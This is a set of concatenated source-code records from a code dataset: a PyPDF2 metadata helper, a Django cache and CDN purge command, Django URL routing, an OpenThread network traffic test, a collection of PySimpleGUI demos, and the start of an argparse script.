sizes.append(size)\n except Exception:\n # Missing or unreadable files are recorded with a size of 0 bytes\n sizes.append(0)\n \n # New Index1 has all the columns of Index0 plus one additional column\n Index1 = Index0\n Index1['PDF Size (bytes)'] = sizes\n return Index1\n \n\ndef pdf_pagenumbers(path, Index0):\n \"\"\"\n This method attempts to identify the number of pages in each of the PDF \n files from the list of files present in Index0. Files which fail to open \n due to any other dependent step will be recorded as having 0 pages. 
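\n \n Example (illustrative only; the root path below is hypothetical and \n Index0 is assumed to be a pandas DataFrame with a 'Data ID' column, as \n used throughout this module): \n Index1 = pdf_pagenumbers('C:/esa_project', Index0) \n Index1['Number of Pages'].head() 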
\n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respective files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional column\n 'Number of Pages', indicating the number of pages in the PDF file. \n \n \"\"\"\n page_numbers = []\n \n # Iterate through each row of the Dataframe\n for index, row in Index0.iterrows():\n try:\n pdf_path = Path(path + \"\\\\Data_Files\\\\PDFs\\\\\" + str(row['Data ID']) + '.pdf')\n with pdf_path.open(\"rb\") as pdf:\n reader = PyPDF2.PdfFileReader(pdf)\n if reader.isEncrypted:\n reader.decrypt(\"\")\n total_pages = reader.getNumPages()\n page_numbers.append(total_pages)\n except Exception:\n # Unreadable or corrupt files are recorded as having 0 pages\n page_numbers.append(0)\n \n # New Index1 has all the columns of Index0 plus one additional column\n Index1 = Index0\n Index1['Number of Pages'] = page_numbers\n return Index1\n \ndef get_outline_present(path, Index0):\n \"\"\"\n This method attempts to identify if the outline (table of contents) is \n present in a PDF or not. Files which fail to open due to any other \n dependent step will be marked as having no outline present.\n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respective files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional column\n 'Outline Present'. This binary column will indicate if the PDF file \n has an outline present or not. 
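\n \n Example (illustrative only; same hypothetical root path and DataFrame \n shape as in pdf_pagenumbers above): \n Index1 = get_outline_present('C:/esa_project', Index0) \n Index1['Outline Present'].sum() # count of PDFs with an outline 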
\n \n \"\"\"\n outline_present = []\n \n # iterate through each row of the Dataframe\n for index, row in Index0.iterrows():\n try:\n pdf_path = Path(path + \"\\\\Data_Files\\\\PDFs\\\\\" + str(row['Data ID']) + '.pdf')\n with pdf_path.open(\"rb\") as pdf:\n reader = PyPDF2.PdfFileReader(pdf)\n if reader.isEncrypted:\n reader.decrypt(\"\")\n s = reader.outlines\n len_s = len(s)\n \n # If length of outline extracted is >0, then outline is present \n if len_s > 0: \n outline_present.append(1)\n else:\n outline_present.append(0)\n except:\n outline_present.append(0)\n \n # New Index1 has all the couloumns as Index0 and an addition coloumn\n Index1 = Index0\n Index1['Outline Present'] = outline_present\n return(Index1)\n \n ","sub_path":"Codes/Section_01_Data_Extraction_Preparation/pdf_metadata.py","file_name":"pdf_metadata.py","file_ext":"py","file_size_in_byte":12260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"308042518","text":"from django.core.management import CommandError\n\nfrom peterbecom.base.basecommand import BaseCommand\nfrom peterbecom.base.fscache import (\n find_missing_compressions,\n invalidate_too_old,\n purge_outdated_cdn_urls,\n)\nfrom peterbecom.base.cdn import keycdn_zone_check\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"Print instead of deleting\",\n )\n parser.add_argument(\n \"--skip-cdn-purge\",\n action=\"store_true\",\n default=False,\n help=\"Don't bother executing CDN purge commands\",\n )\n parser.add_argument(\n \"--revisit\",\n action=\"store_true\",\n default=False,\n help=\"Try to request the original URL again\",\n )\n parser.add_argument(\n \"--max-files\", default=100, help=\"Max number of URLs to purge (possibly)\"\n )\n\n def handle(self, **options):\n invalidate_too_old(\n verbose=options[\"verbosity\"] > 1,\n dry_run=options[\"dry_run\"],\n revisit=options[\"revisit\"],\n )\n\n find_missing_compressions(\n verbose=options[\"verbosity\"] > 1,\n max_files=int(options[\"max_files\"]),\n revisit=options[\"revisit\"],\n )\n\n if not options[\"skip_cdn_purge\"]:\n if not keycdn_zone_check():\n raise CommandError(\"KeyCDN Zone Check failed!\")\n purge_outdated_cdn_urls(\n verbose=options[\"verbosity\"] > 1,\n revisit=options[\"revisit\"],\n dry_run=options[\"dry_run\"],\n max_files=int(options[\"max_files\"]),\n )\n","sub_path":"peterbecom/base/management/commands/fscache.py","file_name":"fscache.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"150757706","text":"# -*- coding:utf-8 -*-\n\"\"\"Dj_pro URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom home import views as home_views\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    url(r'^upload/', include('upload.urls')),\n    url(r'^$', home_views.index, name=\"index\"),\n    url(r'^accounts/login/$', auth_views.login),  # If the user is not logged in, it will redirect to the login page\n    url(r'^demo/', include('demo.urls')),\n    url(r'^featureSelect/', include('feature_select.urls')),\n    url(r'^regression/', include('regression.urls')),\n    url(r'^result/', include('result.urls'))\n]\n","sub_path":"Dj_pro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"214903170","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2018, The OpenThread Authors.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright\n#    notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n#    notice, this list of conditions and the following disclaimer in the\n#    documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the copyright holder nor the\n#    names of its contributors may be used to endorse or promote products\n#    derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport wpan\nfrom wpan import verify\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Test description: Traffic between router and sleepy-end-device\n# (link-local and mesh-local IPv6 addresses)\n\ntest_name = __file__[:-3] if __file__.endswith('.py') else __file__\nprint('-' * 120)\nprint('Starting \\'{}\\''.format(test_name))\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Creating `wpan.Nodes` instances\n\nnode1 = wpan.Node()\nnode2 = wpan.Node()\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Init all nodes\n\nwpan.Node.init_all_nodes()\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Build network topology\n\n# Two-node network (node1 leader/router, node2 sleepy-end-device)\n\nnode1.form('test-PAN')\nnode2.join_node(node1, node_type=wpan.JOIN_TYPE_SLEEPY_END_DEVICE)\n\nverify(node2.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)\nverify(node2.get(wpan.WPAN_NAME) == node1.get(wpan.WPAN_NAME))\nverify(node2.get(wpan.WPAN_PANID) == node1.get(wpan.WPAN_PANID))\nverify(node2.get(wpan.WPAN_XPANID) == node1.get(wpan.WPAN_XPANID))\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Test implementation\n\n# Get the link local addresses\nll1 = node1.get(wpan.WPAN_IP6_LINK_LOCAL_ADDRESS)[1:-1]\nll2 = node2.get(wpan.WPAN_IP6_LINK_LOCAL_ADDRESS)[1:-1]\n\n# Get the mesh-local addresses\nml1 = node1.get(wpan.WPAN_IP6_MESH_LOCAL_ADDRESS)[1:-1]\nml2 = node2.get(wpan.WPAN_IP6_MESH_LOCAL_ADDRESS)[1:-1]\n\nNUM_MSGS = 3\nMSG_LENS = [40, 100, 400, 800, 1000]\nPORT = 1234\n\nfor poll_interval in [10, 100, 300]:\n\n node2.set(wpan.WPAN_POLL_INTERVAL, str(poll_interval))\n verify(node2.get(wpan.WPAN_POLL_INTERVAL) == str(poll_interval))\n\n # all src and dst configuration (link-local and mesh-local)\n for src, dst in [(ll1, ll2), (ll1, ml2), (ml1, ll2), (ml1, ml2)]:\n\n for msg_length in MSG_LENS:\n sender = node1.prepare_tx(src, dst, msg_length, NUM_MSGS)\n recver = node2.prepare_rx(sender)\n\n wpan.Node.perform_async_tx_rx()\n\n verify(sender.was_successful)\n verify(recver.was_successful)\n\n # Send and receive at the same time on same port number\n\n s1 = node1.prepare_tx((src, PORT), (dst, PORT), 'Hi there!', NUM_MSGS)\n r1 = node2.prepare_rx(s1)\n s2 = node2.prepare_tx((dst, PORT), (src, PORT), 'Hello back to you!', NUM_MSGS)\n r2 = node1.prepare_rx(s2)\n\n wpan.Node.perform_async_tx_rx()\n\n verify(s1.was_successful and r1.was_successful)\n verify(s2.was_successful and r2.was_successful)\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Test finished\n\nwpan.Node.finalize_all_nodes()\n\nprint('\\'{}\\' 
passed.'.format(test_name))\n","sub_path":"tests/toranj/ncp/test-007-traffic-router-sleepy.py","file_name":"test-007-traffic-router-sleepy.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"590635145","text":"import PySimpleGUI as sg # Part 1 - The import\nimport matplotlib\nimport numpy as np\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport tkinter\nfrom tkinter import *\n\n\ndef test1():\n    # Define the window's contents\n    layout = [ [sg.Text(\"What's your name?\")],     # Part 2 - The Layout\n               [sg.Input()],\n               [sg.Button('Ok')] ]\n\n    # Create the window\n    window = sg.Window('Window Title', layout)      # Part 3 - Window Definition\n\n    # Display and interact with the Window\n    event, values = window.read()                   # Part 4 - Event loop or Window.read call\n\n    # Do something with the information gathered\n    print('Hello', event, values, \"! Thanks for trying PySimpleGUI\")\n\n    # Finish up by removing from the screen\n    window.close()                                  # Part 5 - Close the Window\n\ndef test2():\n    # Define the window's contents\n    layout = [[sg.Text(\"What's your name?\")],\n              [sg.Input(key='-INPUT-')],\n              [sg.Text(size=(40,1), key='-OUTPUT-')],\n              [sg.Button('Ok'), sg.Button('Quit')]]\n\n    # Create the window\n    window = sg.Window('Window Title', layout)\n\n    # Display and interact with the Window using an Event Loop\n    while True:\n        event, values = window.read()\n        # See if user wants to quit or window was closed\n        if event == sg.WINDOW_CLOSED or event == 'Quit':\n            break\n        # Output a message to the window\n        window['-OUTPUT-'].update('Hello ' + values['-INPUT-'] + \"! Thanks for trying PySimpleGUI\")\n\n    # Finish up by removing from the screen\n    window.close()\n\ndef test3():\n    layout = [[sg.Button(f'{row}, {col}') for col in range(4)] for row in range(4)]\n\n    event_str, values = sg.Window('List Comprehensions', layout).read(close=True)\n    print(event_str, values)\n\n    text = \"Hello\" + \"u\\u00A9\"+\" \"+\"anticancéreux\" + \" 抗肿瘤药 \"\n    event, values = sg.Window('Window Title', [[sg.Text(text)],[sg.Input()],[sg.Button('Ok')]]).read(close=True)\n    print(event, values)\n\n    event, values = sg.Window('Window Title', [[sg.T(\"What's your name?\")],[sg.I()],[sg.B('Ok')]]).read(close=True)\n    print(event, values)\n\ndef test4():\n    filename = sg.popup_get_file('Enter the file you wish to process')\n    sg.popup('You entered', filename)\n\n    n = 300\n    for i in range(1, n):\n        sg.one_line_progress_meter('My Meter', i + 1, n, 'key', 'Optional message')\n    print = sg.Print\n    for i in range(100):\n        print(i)\n\ndef test5():\n    sg.theme('Dark Blue 3')  # please make your windows colorful\n\n    layout = [[sg.Text('Rename files or folders')],\n              [sg.Text('Source for Folders', size=(15, 1)), sg.InputText(), sg.FolderBrowse()],\n              [sg.Text('Source for Files ', size=(15, 1)), sg.InputText(), sg.FolderBrowse()],\n              [sg.Submit(), sg.Cancel()]]\n\n    window = sg.Window('Rename Files or Folders', layout)\n\n    event, values = window.read()\n    window.close()\n    folder_path, file_path = values[0], values[1]  # get the data from the values dictionary\n    sg.Print(folder_path, file_path) ## immediately self-destructs unless blocked\n    n = 100\n    for i in range(1, n):\n        sg.one_line_progress_meter('My Meter', i + 1, n, 'key', 'Optional message')\n\n    print(folder_path, file_path)\n    print(\"EXIT\")\n\ndef test6():\n    import PySimpleGUI as sg\n    import os.path\n\n    # First the window layout in 2 columns\n\n    file_list_column = [\n        [\n            sg.Text(\"Image Folder\"),\n            sg.In(size=(25, 
1), enable_events=True, key=\"-FOLDER-\"),\n sg.FolderBrowse(),\n ],\n [\n sg.Listbox(\n values=[], enable_events=True, size=(40, 20), key=\"-FILE LIST-\"\n )\n ],\n ]\n\n # For now will only show the name of the file that was chosen\n image_viewer_column = [\n [sg.Text(\"Choose an image from list on left:\")],\n [sg.Text(size=(40, 1), key=\"-TOUT-\")],\n [sg.Image(key=\"-IMAGE-\")],\n ]\n\n # ----- Full layout -----\n layout = [\n [\n sg.Column(file_list_column),\n sg.VSeperator(),\n sg.Column(image_viewer_column),\n ]\n ]\n\n window = sg.Window(\"Image Viewer\", layout)\n\n # Run the Event Loop\n while True:\n event, values = window.read()\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n # Folder name was filled in, make a list of files in the folder\n if event == \"-FOLDER-\":\n folder = values[\"-FOLDER-\"]\n try:\n # Get list of files in folder\n file_list = os.listdir(folder)\n except:\n file_list = []\n\n fnames = [\n f\n for f in file_list\n if os.path.isfile(os.path.join(folder, f))\n and f.lower().endswith((\".png\", \".gif\", \".txt\"))\n ]\n window[\"-FILE LIST-\"].update(fnames)\n elif event == \"-FILE LIST-\": # A file was chosen from the listbox\n try:\n filename = os.path.join(\n values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n )\n window[\"-TOUT-\"].update(filename)\n window[\"-IMAGE-\"].update(filename=filename)\n\n except:\n pass\n\n window.close()\n\nmatplotlib.use(\"TkAgg\")\n\ndef draw_figure(canvas, figure):\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\n figure_canvas_agg.draw()\n figure_canvas_agg.get_tk_widget().pack(side=\"top\", fill=\"both\", expand=1)\n return figure_canvas_agg\n\n\ndef test7():\n\n fig = matplotlib.figure.Figure(figsize=(5, 4), dpi=100)\n t = np.arange(0, 3, .01)\n fig.add_subplot(111).plot(t, 2 * np.sin(2 * np.pi * t))\n\n # Define the window layout\n layout = [\n [sg.Text(\"Plot test\")],\n [sg.Canvas(key=\"-CANVAS-\")],\n [sg.Button(\"Ok\")],\n ]\n\n # Create the form and show it without the plot\n window = sg.Window(\n \"Matplotlib Single Graph\",\n layout,\n location=(0, 0),\n finalize=True,\n element_justification=\"center\",\n font=\"Helvetica 18\",\n )\n\n # Add the plot to the window\n draw_figure(window[\"-CANVAS-\"].TKCanvas, fig)\n\n event, values = window.read()\n\n window.close()\n\ndef test8():\n import PySimpleGUI as sg\n import cv2\n import numpy as np\n\n def main():\n sg.theme(\"LightGreen\")\n\n # Define the window layout\n layout = [\n [sg.Text(\"OpenCV Demo\", size=(60, 1), justification=\"center\")],\n [sg.Image(filename=\"\", key=\"-IMAGE-\", size=(300,300), pad=(3,3,12,12))],\n [sg.Radio(\"None\", \"Radio\", True, size=(10, 1))],\n [\n sg.Radio(\"threshold\", \"Radio\", size=(10, 1), key=\"-THRESH-\"),\n sg.Slider(\n (0, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-THRESH SLIDER-\",\n ),\n ],\n [\n sg.Radio(\"canny\", \"Radio\", size=(10, 1), key=\"-CANNY-\"),\n sg.Slider(\n (0, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(20, 15),\n key=\"-CANNY SLIDER A-\",\n ),\n sg.Slider(\n (0, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(20, 15),\n key=\"-CANNY SLIDER B-\",\n ),\n ],\n [\n sg.Radio(\"blur\", \"Radio\", size=(10, 1), key=\"-BLUR-\"),\n sg.Slider(\n (1, 11),\n 1,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-BLUR SLIDER-\",\n ),\n ],\n [\n sg.Radio(\"hue\", \"Radio\", size=(10, 1), key=\"-HUE-\"),\n sg.Slider(\n (0, 225),\n 0,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-HUE SLIDER-\",\n ),\n ],\n [\n sg.Radio(\"enhance\", \"Radio\", size=(10, 1), 
key=\"-ENHANCE-\"),\n sg.Slider(\n (1, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-ENHANCE SLIDER-\",\n ),\n ],\n [sg.Button(\"Exit\", size=(10, 1))],\n ]\n\n # Create the window and show it without the plot\n window = sg.Window(\"OpenCV Integration\", layout, size=(800,1000), location=(200, 400))\n\n cap = cv2.VideoCapture(0)\n\n while True:\n event, values = window.read(timeout=20)\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n\n ret, frame = cap.read()\n\n if values[\"-THRESH-\"]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2LAB)[:, :, 0]\n frame = cv2.threshold(\n frame, values[\"-THRESH SLIDER-\"], 255, cv2.THRESH_BINARY\n )[1]\n elif values[\"-CANNY-\"]:\n frame = cv2.Canny(\n frame, values[\"-CANNY SLIDER A-\"], values[\"-CANNY SLIDER B-\"]\n )\n elif values[\"-BLUR-\"]:\n frame = cv2.GaussianBlur(frame, (21, 21), values[\"-BLUR SLIDER-\"])\n elif values[\"-HUE-\"]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n frame[:, :, 0] += int(values[\"-HUE SLIDER-\"])\n frame = cv2.cvtColor(frame, cv2.COLOR_HSV2BGR)\n elif values[\"-ENHANCE-\"]:\n enh_val = values[\"-ENHANCE SLIDER-\"] / 40\n clahe = cv2.createCLAHE(clipLimit=enh_val, tileGridSize=(8, 8))\n lab = cv2.cvtColor(frame, cv2.COLOR_BGR2LAB)\n lab[:, :, 0] = clahe.apply(lab[:, :, 0])\n frame = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)\n\n imgbytes = cv2.imencode(\".png\", frame)[1].tobytes()\n window[\"-IMAGE-\"].update(data=imgbytes)\n\n window.close()\n\ndef test9():\n import PySimpleGUI as sg\n\n sg.theme('Dark Blue 3') # Add a touch of color\n # All the stuff inside your window.\n layout = [[sg.Text('Some text on Row 1')],\n [sg.Text('Enter something on Row 2'), sg.InputText()],\n [sg.Button('Ok'), sg.Button('Cancel')]]\n\n # Create the Window\n window = sg.Window('Window Title', layout)\n # Event Loop to process \"events\" and get the \"values\" of the inputs\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel\n break\n print('You entered ', values[0])\n\n window.close()\n\ndef test10():\n import PySimpleGUI as sg\n\n layout = []\n for i in range(1, 6):\n layout += [sg.Text(f'{i}. xxx'), sg.In(key=i)],\n layout += [[sg.Button('Save'), sg.Button('Exit')]]\n\n window = sg.Window('To Do List Example', layout)\n event, values = window.read()\n\ndef test11():\n # fails on first line\n\n import PySimpleGUI as SG\n# AttributeError: __enter__\n with SG.FlexForm('Everything bagel') as form:\n layout = [\n [SG.Text('All graphic widgets in one form!', size=(30, 1), font=(\"Helvetica\", 25), text_color='blue')],\n [SG.Text('Here is some text.... and a place to enter text')],\n [SG.InputText()],\n [SG.Checkbox('My first checkbox!'), SG.Checkbox('My second checkbox!', default=True)],\n [SG.Radio('My first Radio! 
', \"RADIO1\", default=True), SG.Radio('My second Radio!', \"RADIO1\")],\n [SG.Multiline(default_text='This is the default Text shoulsd you decide not to type anything',\n scale=(2, 10))],\n [SG.InputCombo(['Combobox 1', 'Combobox 2'], size=(20, 3)),\n SG.Slider(range=(1, 100), orientation='h', size=(35, 20), default_value=85)],\n [SG.Listbox(values=['Listbox 1', 'Listbox 2', 'Listbox 3'], size=(30, 6)),\n SG.Slider(range=(1, 100), orientation='v', size=(10, 20), default_value=25),\n SG.Slider(range=(1, 100), orientation='v', size=(10, 20), default_value=75),\n SG.Slider(range=(1, 100), orientation='v', size=(10, 20), default_value=10)],\n [SG.Text('_' * 100, size=(70, 1))],\n [SG.Text('Choose Source and Destination Folders', size=(35, 1))],\n [SG.Text('Source Folder', size=(15, 1), auto_size_text=False, justification='right'),\n SG.InputText('Source'), SG.FolderBrowse()],\n [SG.Text('Destination Folder', size=(15, 1), auto_size_text=False, justification='right'),\n SG.InputText('Dest'),\n SG.FolderBrowse()],\n [SG.Submit(), SG.Cancel(), SG.SimpleButton('Customized', button_color=('white', 'green'))]\n ]\n\n button, values = form.LayoutAndRead(layout)\n\ndef test12():\n import PySimpleGUI as sg\n\n sg.theme('Dark Brown 1')\n\n headings = ['HEADER 1', 'HEADER 2', 'HEADER 3', 'HEADER 4']\n header = [[sg.Text(' ')] + [sg.Text(h, size=(14, 1)) for h in headings]]\n\n input_rows = [[sg.Input(size=(15, 1), pad=(0, 0)) for col in range(4)] for row in range(10)]\n\n layout = header + input_rows\n\n window = sg.Window('Table Simulation', layout, font='Courier 12')\n event, values = window.read()\n\ndef test13():\n import PySimpleGUI as sg\n\n def ToDoItem(num):\n return [sg.Text(f'{num}. '), sg.CBox(''), sg.In()]\n\n layout = [ToDoItem(x) for x in range(1, 6)] + [[sg.Button('Save'), sg.Button('Exit')]]\n\n window = sg.Window('To Do List Example', layout)\n event, values = window.read()\n\ndef test14():\n import PySimpleGUI as sg\n import matplotlib.pyplot as plt\n\n \"\"\"\n Simultaneous PySimpleGUI Window AND a Matplotlib Interactive Window\n A number of people have requested the ability to run a normal PySimpleGUI window that\n launches a MatplotLib window that is interactive with the usual Matplotlib controls.\n It turns out to be a rather simple thing to do. The secret is to add parameter block=False to plt.show()\n \"\"\"\n\n def draw_plot():\n plt.plot([0.1, 0.2, 0.5, 0.7])\n plt.show(block=False)\n\n layout = [[sg.Button('Plot'), sg.Cancel(), sg.Button('Popup')]]\n\n window = sg.Window('Have some Matplotlib....', layout)\n\n while True:\n event, values = window.read()\n if event in (sg.WIN_CLOSED, 'Cancel'):\n break\n elif event == 'Plot':\n draw_plot()\n elif event == 'Popup':\n sg.popup('Yes, your application is still running')\n window.close()\n\ndef test15():\n import PySimpleGUI as sg\n \"\"\" \n Demonstrates using a \"tight\" layout with a Dark theme. \n Shows how button states can be controlled by a user application. 
The program manages the disabled/enabled \n states for buttons and changes the text color to show greyed-out (disabled) buttons \n \"\"\"\n\n sg.ChangeLookAndFeel('Dark')\n sg.SetOptions(element_padding=(0, 0))\n\n layout = [[sg.T('User:', pad=((3, 0), 0)), sg.OptionMenu(values=('User 1', 'User 2'), size=(20, 1)),\n sg.T('0', size=(8, 1))],\n [sg.T('Customer:', pad=((3, 0), 0)), sg.OptionMenu(values=('Customer 1', 'Customer 2'), size=(20, 1)),\n sg.T('1', size=(8, 1))],\n [sg.T('Notes:', pad=((3, 0), 0)), sg.In(size=(44, 1), background_color='white', text_color='black')],\n [sg.Button('Start', button_color=('white', 'black'), key='Start'),\n sg.Button('Stop', button_color=('white', 'black'), key='Stop'),\n sg.Button('Reset', button_color=('white', 'firebrick3'), key='Reset'),\n sg.Button('Submit', button_color=('white', 'springgreen4'), key='Submit')]\n ]\n\n window = sg.Window(\"Time Tracker\", layout, default_element_size=(12, 1), text_justification='r',\n auto_size_text=False, auto_size_buttons=False, default_button_element_size=(12, 1),\n finalize=True)\n\n window['Stop'].update(disabled=True)\n window['Reset'].update(disabled=True)\n window['Submit'].update(disabled=True)\n recording = have_data = False\n while True:\n event, values = window.read()\n print(event)\n if event == sg.WIN_CLOSED:\n exit(69)\n if event == 'Start':\n window['Start'].update(disabled=True)\n window['Stop'].update(disabled=False)\n window['Reset'].update(disabled=False)\n window['Submit'].update(disabled=True)\n recording = True\n elif event == 'Stop' and recording:\n window['Stop'].update(disabled=True)\n window['Start'].update(disabled=False)\n window['Submit'].update(disabled=False)\n recording = False\n have_data = True\n elif event == 'Reset':\n window['Stop'].update(disabled=True)\n window['Start'].update(disabled=False)\n window['Submit'].update(disabled=True)\n window['Reset'].update(disabled=False)\n recording = False\n have_data = False\n elif event == 'Submit' and have_data:\n window['Stop'].update(disabled=True)\n window['Start'].update(disabled=False)\n window['Submit'].update(disabled=True)\n window['Reset'].update(disabled=False)\n recording = False\n\ndef delib_error():\n import PySimpleGUI as sg\n\n def main():\n sg.set_options(suppress_raise_key_errors=False, suppress_error_popups=False, suppress_key_guessing=False)\n\n layout = [[sg.Text('My Window')],\n [sg.Input(k='-IN-'), sg.Text(size=(12, 1), key='-OUT-')],\n [sg.Button('Go'), sg.Button('Exit')]]\n\n window = sg.Window('Window Title', layout, finalize=True)\n\n while True: # Event Loop\n event, values = window.read()\n print(event, values)\n if event == sg.WIN_CLOSED or event == 'Exit':\n break\n# this is a deliberate error\n window['-O U T-'].update(values['-IN-'])\n window.close()\n\n def func():\n\n main()\n\n func()\n\ndef tree():\n treedata = sg.TreeData()\n\n treedata.Insert(\"\", '_A_', 'A', [1, 2, 3])\n treedata.Insert(\"\", '_B_', 'B', [4, 5, 6])\n treedata.Insert(\"_A_\", '_A1_', 'A1', ['can', 'be', 'anything'])\n\n layout = [[sg.Text('My Window')],\n [treedata],\n [sg.Input(k='-IN-'), sg.Text(size=(12, 1), key='-OUT-')],\n [sg.Button('Go'), sg.Button('Exit')]]\n\n window = sg.Window('Window Title', layout, finalize=True)\n\n while True: # Event Loop\n event, values = window.read()\n print(event, values)\n if event == sg.WIN_CLOSED or event == 'Exit':\n break\n # this is a deliberate error\n# window['-O U T-'].update(values['-IN-'])\n window.close()\n\n\ndef slider():\n # Testing async window, see if can have a slider\n # that 
adjusts the size of text displayed\n\n import PySimpleGUI as sg\n fontSize = 12\n layout = [[sg.Spin([sz for sz in range(6, 172)], font=('Helvetica 20'), initial_value=fontSize, change_submits=True,\n key='spin'),\n sg.Slider(range=(6, 172), orientation='h', size=(10, 20),\n change_submits=True, key='slider', font=('Helvetica 20')),\n sg.Text(\"Aa\", size=(2, 1), font=\"Helvetica \" + str(fontSize), key='text')]]\n\n sz = fontSize\n window = sg.Window(\"Font size selector\", layout, grab_anywhere=False)\n # Event Loop\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED:\n break\n sz_spin = int(values['spin'])\n sz_slider = int(values['slider'])\n sz = sz_spin if sz_spin != fontSize else sz_slider\n if sz != fontSize:\n fontSize = sz\n font = \"Helvetica \" + str(fontSize)\n window['text'].update(font=font)\n window['slider'].update(sz)\n window['spin'].update(sz)\n\n print(\"Done.\")\n\n# test1()\n# test2()\n# test3()\n# test4()\ntest5()\n# test6()\n# test7()\n# test8()\n# test9()\n# test10()\n# test11()\n# test12()\n# test13()\n# test14()\n# test15()\n# delib_error()\n# tree()\n# slider()","sub_path":"pyami/tst/pysimpleg.py","file_name":"pysimpleg.py","file_ext":"py","file_size_in_byte":20623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"240132102","text":"import os\r\nimport argparse\r\n\r\nfrom Analyzer import filter_woody_plants\r\nfrom SheetManager import read_csv, export_csv\r\n\r\n# Detect missing packages before any action is taken\r\nimport csv, requests, bs4\r\n\r\nsource_path = None\r\ntarget_path = None\r\nexclude_list = []\r\ncancel = False\r\n\r\n# The argparse module is very helpful in this program, and the way it's set up allows source and target to be individually optional, which is different from when I was using sys.argv\r\n# The only reason I wanted to include argparse originally was to add --exclude and to have it feel native, but it changed how source and target are written\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-s\", \"--source\", nargs=1, help=\"the file path of the source csv\") # Only accepts one argument\r\nparser.add_argument(\"-t\", \"--target\", nargs=1, help=\"the file path of the target csv\") # 